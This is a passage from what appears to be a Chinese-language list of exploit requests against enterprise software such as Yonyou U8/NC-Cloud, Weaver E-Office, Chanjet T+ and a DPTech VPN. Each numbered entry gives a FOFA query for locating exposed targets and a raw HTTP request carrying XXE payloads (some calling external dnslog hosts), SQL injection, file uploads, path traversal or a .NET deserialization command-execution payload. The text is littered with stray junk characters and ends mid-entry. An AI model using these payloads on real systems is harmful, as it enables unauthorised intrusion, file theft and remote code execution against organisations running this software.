. V# p b {6 ]# |6 }User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info% F) h# ]* P6 i/ T6 l
Accept-Encoding: gzip, deflate
/ ?/ M) h) P4 R2 F4 EAccept: */*; ^+ d/ H; l1 E6 S T' X' l" i9 {
Connection: close) T0 H# k8 D& f. y
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA4 \' X t) k& y8 f1 U
Content-Length: 1907 ?5 |) E. ^- Z) R2 h# x% [
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df05 f2 |- g+ s; |
: j1 h1 F% W, g0 M* I8 @. x2 o
--fd28cb44e829ed1c197ec3bc71748df0$ f8 W/ v4 X( _( G
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
; {* I0 G" r+ o4 N9 @1 W: G3 c
( g* u$ ~- Q5 B<%out.println(1111*1111);%>" `2 i$ Y+ _( y. U# ~2 T' ?
--fd28cb44e829ed1c197ec3bc71748df0--
# k, }; J6 e7 d5 W* b( R. B; O/ o7 Z! a! e8 ?$ `* x% [+ j$ `
0 ^% H( O6 A, L8 l3 a0 Z' E. |
36. 用友NC-Cloud soapFormat XXE6 M6 i1 G2 x5 J
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
# |: q$ K2 Z7 b2 a' dPOST /uapws/soapFormat.ajax HTTP/1.1& c/ m% ?! b" n/ S6 J: X( Y
Host: 192.168.40.130:8989* ]% s$ K3 }" A( n1 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
! o( b1 N+ O' C7 nContent-Length: 263
- V2 Q* p* d% b* }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: l& r' s0 s5 G- s3 {Accept-Encoding: gzip, deflate
' {) o; a3 Z8 |5 `+ w, V: v1 ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; `) a! s4 F' B! d- Q- }Connection: close, @; u2 T8 c+ d( y! v" p* b r- x
Content-Type: application/x-www-form-urlencoded' t/ d2 h6 L* J( e2 }" O& {2 y
Upgrade-Insecure-Requests: 1
: D0 q# |, a4 Y" e% z( \8 }0 }* Q5 {) _
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a+ ]& s A5 N' U- X" F
" x0 p+ \0 H. L) f. k5 x
2 E1 B+ a& J! q8 v5 {. ? ^8 w5 m37. 用友NC-Cloud IUpdateService XXE0 O, y# L8 n0 o% U! N$ V, W
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
" m6 T2 O: d' G7 E$ { l. D( nPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
]7 A. ^: J( aHost: 192.168.40.130:8989
+ T, y O; O9 t% UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 F6 G8 C1 f0 S) ?1 Y
Content-Length: 421- W, R3 v; U$ F" _1 \( _1 O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
) ?9 i- M8 S4 f: j9 qAccept-Encoding: gzip, deflate; l; V6 i2 F; C' |7 t
Accept-Language: zh-CN,zh;q=0.90 p- S4 E! }/ y- B) u
Connection: close% l+ v$ J$ r' l3 _, k) k
Content-Type: text/xml;charset=UTF-8
6 E, Y! a; e+ e. |SOAPAction: urn:getResult; b6 v. c/ p. q% e7 R) `/ L
Upgrade-Insecure-Requests: 15 i% Z2 b; s* y1 J6 h
4 i* [8 z2 ^! S% `
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">7 @! C! \& \( p4 m
<soapenv:Header/>/ B$ E4 v5 d* @! W% z: q
<soapenv:Body>
3 y- W, W3 @9 `<iup:getResult>
) M. v( P( ?7 y$ l5 f. i ^4 B* Y<!--type: string-->9 U; z' X1 h2 |, t
<iup:string><![CDATA[
7 G5 Z p- u& }# @8 n& X<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
$ y/ }8 M$ P1 w, Y<xxx/>]]></iup:string>
0 c, {; o8 l( s' ~7 @</iup:getResult>
: M0 ], Y" K! B3 f</soapenv:Body>
3 S, L* ?7 y( K% X) A. c" b4 V</soapenv:Envelope># \) R5 q5 G0 _. }" O5 D: @
% J% b" m2 a' N0 [+ M$ v4 L& R
/ N7 ~. t$ @' v2 p" A6 Z% H* F* K3 N" e7 x" L
38. 用友U8 Cloud smartweb2.RPC.d XXE5 W e& K1 Q; P) i6 j9 e
FOFA:app="用友-U8-Cloud"4 Z2 ~$ p6 B; Q& ~2 _
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1% j0 V3 u$ h% O' ?1 z
Host: 192.168.40.131:8088
4 D4 J( i! ^: YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
6 C: P( s% [2 [2 I0 t. p P$ a ]Content-Length: 260
- l! C0 P: ~7 F/ z$ H( zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 v8 W, j v& A9 |4 n& n
Accept-Encoding: gzip, deflate
; S' J# K7 c- d6 U2 Z* PAccept-Language: zh-CN,zh;q=0.91 {7 A: \- ^4 o' C
Connection: close
6 Y' _( \9 A+ ?9 N* E4 m, DContent-Type: application/x-www-form-urlencoded. K5 p, v7 D9 u
# ]0 I- s) m7 P: ^" C
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>% P& ?/ t. a D5 h. z8 L( f& Y
- `2 N1 X' l* d' S N+ b" ?5 t1 \) ^' ~5 W k/ _
39. 用友U8 Cloud RegisterServlet SQL注入
9 c2 F4 [) W3 u5 c; g% uFOFA:title="u8c"9 c, l% E4 E2 }' x2 ?
POST /servlet/RegisterServlet HTTP/1.1
- J& I( \& e& r9 Y7 r) h9 qHost: 192.168.86.128:80894 m" |* ~2 ]/ w f& i* L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.368 X+ [; q- y4 G; k+ U
Connection: close
; R' z a. h* KContent-Length: 853 b4 e, U2 Z" Y g
Accept: */*
7 b5 h: i" H) uAccept-Language: en
/ \3 Y5 v( t5 @8 M' |. {4 NContent-Type: application/x-www-form-urlencoded& W$ {9 ~1 p, w" T( p5 L. Z
X-Forwarded-For: 127.0.0.15 t, A% ]: H9 y* k' o% F5 I; d) w
Accept-Encoding: gzip M$ D* i/ _( y
x) S$ q1 ?& }3 c% dusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--0 G; A( u- C) I: b9 M- |4 y
4 S2 B2 z# N' J7 _# [0 b* g
+ ~5 t' X3 y* y/ r% D
40. 用友U8-Cloud XChangeServlet XXE y. s& \2 ^7 }& n% `' _
FOFA:app="用友-U8-Cloud"
$ D$ C1 q7 I1 M- _: C. UPOST /service/XChangeServlet HTTP/1.1
7 d* j. I7 i/ b K5 J1 h9 k" PHost: x.x.x.x2 I! A' q1 N5 x5 q) V+ p
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 R* f+ [' C* q. U9 oContent-Type: text/xml
8 B3 h0 _7 H: Y8 z9 @% PConnection: close- S5 o1 i3 G) J* H
. X/ X8 U9 p& |8 g% A3 d' f3 y<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
2 F. R9 u3 A: M6 N$ A8 X- c( u3 R6 G+ w( O
1 m* m' \, y4 {41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
- g" p0 y' ^. ]. i9 ~& bFOFA:app="用友-U8-Cloud"( i# l$ G+ P9 X: u9 M5 u
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
' ~4 h. {8 t8 J) ?1 bHost:
) `! ~( v/ O* a" T8 Y* r; aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) o1 w- ~. I, T3 y! PContent-Type: application/json4 s1 N. F% I7 ~
Accept-Encoding: gzip f4 z4 `; m- h8 W. \
Connection: close
2 ?8 x7 M6 ?* s& P7 W4 s
4 [2 J: b# L: q/ m \2 c* T( i9 e- f+ o3 o# v: O
42. 用友GRP-U8 SmartUpload01 文件上传6 X7 R% n) x G) A
FOFA:app="用友-GRP-U8"; N u6 ?% U- ~) ^! @
POST /u8qx/SmartUpload01.jsp HTTP/1.1: {2 [5 d6 ` S3 E! e2 e- _
Host: x.x.x.x
7 L% A4 O- u) ]6 v2 NContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
+ ^$ T# Y6 [ T: P- m. qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.366 m6 ^+ D) k; [& b
% H- c& P! ]) N
PAYLOAD% T$ v, D L: i
" F% q' c9 k7 i: X/ M
& A! O# g$ E( q2 Thttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml% ^$ q, \* e, J7 u, g
4 x; X1 \. e1 c8 |, Q$ H
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
3 ^/ |8 r$ Y7 u, X6 a" gFOFA:app="用友-GRP-U8"
: m( Z( t1 U9 `+ G cPOST /services/userInfoWeb HTTP/1.1
+ y6 P1 B( ^: T( X D$ f8 k3 ~" |: pHost: your-ip
1 B R8 H5 e; }% z2 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.365 s! q6 v' D6 f/ I3 k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! A1 S& u7 i( H+ B6 m7 wAccept-Encoding: gzip, deflate. V/ o b3 Z9 C' L! c; ? g. I( ~% w
Accept-Language: zh-CN,zh;q=0.9; B l* n4 Z4 r! V3 Z' o
Connection: close
9 W3 t: N; o4 Q0 @; g; V+ kSOAPAction:
- k( T5 w/ N( o# R0 pContent-Type: text/xml;charset=UTF-8
. m- D: H# }9 h. h! g7 p! n4 i* W$ v, t) ^1 A- \! f
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">& l1 Y( W% z' K- J
<soapenv:Header/>2 j$ ~. e# B. j5 @
<soapenv:Body>% u' I' ?, `/ S" S
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">4 j4 U4 j( D6 B. ^8 w; o
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>& J' `+ H: u. H0 N' b
</ser:getUserNameById># S+ ^ P1 M2 L# o7 D9 F$ P% H$ q
</soapenv:Body>. i! m3 E% H, |9 U. C, m& [- S
</soapenv:Envelope>2 I% l" P6 G9 S! r+ r. N
; _5 A) S6 Q5 t) Q; f8 Z' H8 Y
/ W# r* L- m7 H6 t5 Q w% A44. 用友GRP-U8 bx_dj_check.jsp SQL注入
4 Q9 t9 g4 s7 a- j, L4 ^) G5 i; k5 BFOFA:app="用友-GRP-U8"- x4 r$ y- \' ^6 }! ~: R! l+ U# h
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.18 K7 ]6 M' e. k- I0 D: }
Host: your-ip- ]: [2 J% p9 J. u' j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.360 ~/ g* G! d5 a8 `8 L1 R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* {( R8 k3 D! {0 n2 \2 CAccept-Encoding: gzip, deflate! i1 A. x+ \4 N) w) `7 k
Accept-Language: zh-CN,zh;q=0.9) l4 b4 I4 x9 q) L" ]% Y
Connection: close
: z, J3 U$ x9 g9 s
/ F5 u' h0 I/ ]$ ?- Z' K1 c0 k2 _
45. 用友GRP-U8 ufgovbank XXE
. e, Y7 C" C- A/ a- L' L8 bFOFA:app="用友-GRP-U8"
5 M% o# x$ ]% n {& i% @POST /ufgovbank HTTP/1.1; X. z4 u m# W) M+ l4 ^0 X. z
Host: 192.168.40.130:2226 Z5 C9 r, C; A c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.00 X5 i/ x2 u$ Y# \
Connection: close: F6 }9 g0 P$ l* B
Content-Length: 161$ E- U6 {* q# n" U: h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 `! ]; }+ S% v- c7 c$ NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ C9 \: E% ^* dContent-Type: application/x-www-form-urlencoded- x( g( }$ x$ E9 T' X
Accept-Encoding: gzip
7 `2 {/ b1 G. Y/ @/ t. D9 B
7 R" I0 d+ s* E. |8 creqData=<?xml version="1.0"?> V7 Z3 f6 T& Q5 y
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest7 ~# B6 I l9 r. X, l
% q" C% y2 `$ j5 K; V5 v3 A
/ e5 Z2 |$ E0 b/ I) L& f' M46. 用友GRP-U8 sqcxIndex.jsp SQL注入; K8 c9 @1 y8 m* u9 B/ X) i& D% M5 p
FOFA:app="用友-GRP-U8"
- T8 |! Z! M" X5 QGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
* Z! a( v: [ i' G5 E. Y' X) z6 ] SHost: your-ip
5 F2 L/ h' _7 [7 y1 x) VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
/ T9 ?4 P( O2 B' o7 h SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) Y. ~/ `0 L/ X( E) B# W+ A% d3 Y
Accept-Encoding: gzip, deflate" g6 Y# N T( D$ V7 k8 ]1 N
Accept-Language: zh-CN,zh;q=0.9
% M9 \2 x: w7 Y, m* a) @ V; DConnection: close( b- D8 b/ ~' [" ^3 |
" S- w" [8 Q% b# e) \/ d! ~
, R) w/ ?- B& N$ `. v2 W7 o. h0 e: |47. 用友GRP A++Cloud 政府财务云 任意文件读取1 K9 i" K7 k0 V
FOFA:body="/pf/portal/login/css/fonts/style.css"' d+ c4 ^) ]! u; O
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
" x; @: c5 j9 KHost: x.x.x.x+ O8 q' t1 R/ i* i' n7 p& O/ f
Cache-Control: max-age=0
9 m2 F9 `. f/ l% w% N9 nUpgrade-Insecure-Requests: 1
( Q5 W" M! ^7 D" v, n1 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' J" { f: ^2 D: T% t7 m9 h" ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& R; {5 O7 p0 ?
Accept-Encoding: gzip, deflate, br& i' F$ z6 i" w, b) D0 v& @
Accept-Language: zh-CN,zh;q=0.9
) u/ e% d- i, N wIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
( E. U4 T) }3 s; qConnection: close
: n- S: L# F0 a: q2 |9 l" X+ T" _$ t h. N3 `
: L, H" \6 W; G. C* r7 A" d
5 p9 N+ b0 N! D+ n4 ]) ^48. 用友U8 CRM swfupload 任意文件上传
8 b" Y' s( `1 i. t7 P. X" dFOFA:title="用友U8CRM"
/ {9 G2 j/ O/ u4 {+ M! WPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
- W# X0 J4 @5 O& ~/ M* ~Host: your-ip0 c* t5 A9 \. o9 t- o' S+ H; k; O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
9 j$ ^$ n" d) O+ M# yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% v6 r0 x1 M1 C n4 d7 f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' n! F$ X% D* n* [Accept-Encoding: gzip, deflate
; {6 q6 N8 l" ]/ }8 lContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
2 ~+ p# ]6 S( K% p------269520967239406871642430066855
2 l0 `! h) A9 L% N- E; [Content-Disposition: form-data; name="file"; filename="s.php"; |- a5 [- q E! E/ x0 }" u
1231
u8 B6 u8 I1 Y! O* q' e* MContent-Type: application/octet-stream( A) v; L! S3 C6 P1 O) V, e* \
------269520967239406871642430066855
; v! G l8 d" R. YContent-Disposition: form-data; name="upload"
# ]& g; o1 ]6 ~" I- ]% ` S- T( ~upload
8 n" X- u: @, F I2 X. W------269520967239406871642430066855--/ E5 B7 e# U/ m8 I
) k- K( I$ S+ I$ H4 C- W
6 k q" m" {/ A3 L! ~8 S- h7 z
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
% @) |7 i# b4 w0 {5 \1 o( HFOFA:body="用友U8CRM"
- ]0 ^0 c$ N. w, }" Z o. O( v8 N- z
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1 b" O+ c; p& a6 I! c
Host: x.x.x.x) o! e. f5 c# S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0# @( h* {5 w! w. @8 {* e' L2 M" o+ L
Content-Length: 329+ Q% l! a# I9 |2 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 E9 q6 P6 U( E( y0 t+ d! Q2 C
Accept-Encoding: gzip, deflate
: h4 _" Z, v1 J/ r0 ~, vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' g$ J8 J% M" C& \1 i
Connection: close
i. X1 j9 g! G% V. x/ hContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
' O: Y1 v3 t& l6 }2 H( R
* {/ Q, A) `$ {. {5 B G-----------------------------vvv3wdayqv3yppdxvn3w( C( R; A3 q6 q& t6 D
Content-Disposition: form-data; name="file"; filename="%s.php "
9 o0 f. V8 l) u6 H/ P) q3 |+ [Content-Type: application/octet-stream
8 q! U7 Y8 F5 s: a7 G8 O
8 v6 S8 e }% Y9 Bwersqqmlumloqa7 A+ g i5 T$ d+ k5 H0 \
-----------------------------vvv3wdayqv3yppdxvn3w# \/ e/ i/ ^' @8 J; F9 D
Content-Disposition: form-data; name="upload"
: B* f3 w2 ^, v" ~1 S& y9 ?' P; Q% U% B- b4 q# \; [
upload
/ U) ^2 s! V5 r# g-----------------------------vvv3wdayqv3yppdxvn3w--
, R% g# A4 l3 |7 y5 @) o8 O- _& z5 b4 f# e% P1 K' A
( _5 n3 }; x; A& M E0 q( @2 W Xhttp://x.x.x.x/tmpfile/updB3CB.tmp.php
9 z. p& }, F' @4 m! @7 n Y! A# c# e, Z
50. QDocs Smart School 6.4.1 filterRecords SQL注入
: |& Y7 Q" B* r, Y! c( SFOFA:body="close closebtnmodal"* C; o$ `% b m( k( j. l
POST /course/filterRecords/ HTTP/1.1
1 b1 ?3 g+ u! |+ g+ uHost: x.x.x.x) d5 V9 [2 o" ~. R- o
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 ]- A: Y3 b* n& ^1 d8 a
Connection: close
4 T$ l: ~! g& S) V% uContent-Length: 2240 w0 k( N2 Z1 p4 V, j! A9 i
Accept: */*- D$ D4 C- A# X$ ?
Accept-Language: en
+ \% K) I7 ~& t; `4 X' RContent-Type: application/x-www-form-urlencoded
; N, W7 M8 _( w* M9 [+ UAccept-Encoding: gzip
1 p% C" o) d( p+ q
# t! M$ Q* b' n" u4 E- v7 gsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
, c8 f$ d2 V1 E
3 K ?! f- ^4 b
. y% A6 C( @; Y; H4 D51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入' \4 T' _( K# z4 L* _
FOFA:app="云时空社会化商业ERP系统"
- p$ v" \6 q0 b1 GGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1$ | d9 p/ e2 w, P3 q
Host: your-ip
Z* d8 W/ T1 q6 _, W/ {9 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36; e! f* \- B' \; h+ U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- n B' x+ S' s; fAccept-Encoding: gzip, deflate# H S% d9 i4 E( u9 B
Accept-Language: zh-CN,zh;q=0.9" r* ^) B. M* N p* P
Connection: close
$ S# g) y9 y8 D3 I- \8 J
$ P/ C6 ~) ?# s/ b
# |9 W0 c4 i# b52. 泛微E-Office json_common.php sql注入5 u- F) C0 D" @! z8 i0 p. ?
FOFA:app="泛微-EOffice"8 Q! f) Y: o9 d6 a* ^
POST /building/json_common.php HTTP/1.12 m) e9 d, M; u/ I, [7 j
Host: 192.168.86.128:8097
: u+ c9 Y- R: Q" b, _& yUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 T& n M' |% k. J. qConnection: close
& L( e5 i0 Q1 T/ eContent-Length: 87* B( _4 b5 l2 Z) }0 ]4 c
Accept: */*
0 _6 ?0 V$ Y, h0 A2 P4 RAccept-Language: en
: i; R5 ~' ]: u1 L( K. n dContent-Type: application/x-www-form-urlencoded
* G6 p, u2 t- L! @Accept-Encoding: gzip2 s' ]5 D# T( q( W) o# f$ G
- Z+ z5 `7 z- _7 |+ x" \2 T. }tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333- t$ ?7 J. e! p6 R/ x
( g' U. O: [. G3 J9 s6 a9 H
$ O: t5 S8 Z) x C& a6 T/ f53. 迪普 DPTech VPN Service 任意文件上传5 {& z6 x! R. w% y/ B$ U
FOFA:app="DPtech-SSLVPN"7 v- R& |6 z2 e$ W' J
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
$ m* @8 k4 y$ x x0 X
% E5 H, N8 t! e* r3 d p" l7 e" Y3 ]: Q1 z, b% y" O
54. 畅捷通T+ getstorewarehousebystore 远程代码执行/ T" ?2 J1 F& n3 ?$ b7 B" A1 o
FOFA:app="畅捷通-TPlus"
* Y* R$ S3 f: }$ V5 t! [# M第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件& ~9 h5 g9 }. a
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"( z: p8 {5 B- D$ C# W! Y
3 j+ D+ s0 n) H8 b5 P5 b6 g i& S m- h; n- Y0 S F5 ?
完整数据包" X, [9 y; U9 e) q4 D! }0 z; Z, d
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
( U6 D f/ [5 U. W* R7 t2 XHost: x.x.x.x
+ r/ D/ e0 x- J7 y+ dUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
7 w2 p7 u/ `# nContent-Length: 593/ F- p2 f `, G% k, n. X
# V# k' [) H$ u3 y! @9 G, }- x7 X+ o
{& r8 _7 ?, f/ W) ?0 k
"storeID":{
. e/ I! R/ V8 a5 J: J "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
4 ]0 F7 x: U$ u: F) H1 c "MethodName":"Start",4 E M0 _% T a; O" P$ B
"ObjectInstance":{
0 W9 `+ w5 B2 Y# O "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
D5 Q D" y# y2 h& z5 d' Y "StartInfo":{+ T8 z/ W7 M3 \+ T; [+ o
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
4 k) `3 G0 \4 H6 |7 l: ?4 O "FileName":"cmd",: n1 F2 G* S s9 q; \& ]
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
# F9 f% k" |; ^/ M* V8 T6 M }& E4 ^0 N7 m5 C; ]* G8 M
}
3 G- P2 R/ e& J8 v }' \* z1 s7 Z6 h. G- g
}+ B: B w* H; f1 [8 s
5 ]0 z, i; z# Z! x& u' d) d6 v
) N- c2 K {/ M" e9 E6 g8 m第二步,访问如下url, S/ t! {& v4 v
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt# k5 y" n" L$ A7 I7 u3 ~" P/ V
1 j- B5 p+ `0 C+ I, b, D
S4 \; P4 ]4 k
55. 畅捷通T+ getdecallusers信息泄露6 O! U* x% b: c0 w9 W7 @
FOFA:app="畅捷通-TPlus"$ @: J3 D/ n7 G/ H+ x
第一步,通过, X% R$ Z. ?8 l& s1 M$ u9 h& ~$ O
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie5 g' X8 ]& N3 A
第二步,利用获取到的Cookie请求
- k% c7 g0 ?3 p. M/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
; E9 y7 Q. {. T, t7 i
& ^" C$ o( O! f: \0 [5 q9 a56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
$ p( ?7 v, b" g' \) c: TFOFA: app="畅捷通-TPlus"/ Y% A7 m: E N; F* @2 A( L8 q! n
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
5 L8 q: v- q4 R9 I6 D, P2 WHost: x.x.x.x
6 D* o& A: K/ X" zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
( B( F Q- u% H" H; ?4 a: hContent-Type: application/json
( B' O( o/ h: \) ?! V$ P1 S" n" e% h
{7 @* p- j7 _9 i2 b
"storeID":{0 r/ ^- R1 \: w7 j' ^, e' c) O
